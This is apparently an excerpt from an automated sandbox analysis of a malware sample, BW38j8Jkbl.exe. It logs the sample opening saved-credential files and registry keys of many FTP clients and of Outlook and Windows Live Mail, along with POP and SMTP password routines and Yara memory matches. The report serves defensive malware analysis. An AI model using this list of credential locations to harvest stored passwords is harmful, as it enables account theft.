Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\FTPRush\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.sqlite
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\GHISLER\wcx_ftp.ini
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Windows\32BitFtp.ini
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\LeapWare\LeapFTP\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\INSoftware\NovaFTP\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\FlashFXP\4\Quick.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\3D-FTP\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\Frigate3\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\NetSarang\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\GPSoftware\Directory Opus\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\FTPRush\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\SharedSettings.sqlite
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\FlashFXP\3\History.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Sites.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: HKEY_LOCAL_MACHINE\Software\TurboFTP
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Quick.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\FlashFXP\4\History.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.ccs
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Windows\wcx_ftp.ini
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.sqlite
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\RhinoSoft.com\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\CuteFTP\sm.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword 1_2_0040EBA3
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, SmtpPassword 1_2_0040EBA3

Remote Access Functionality

Source: Yara match File source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR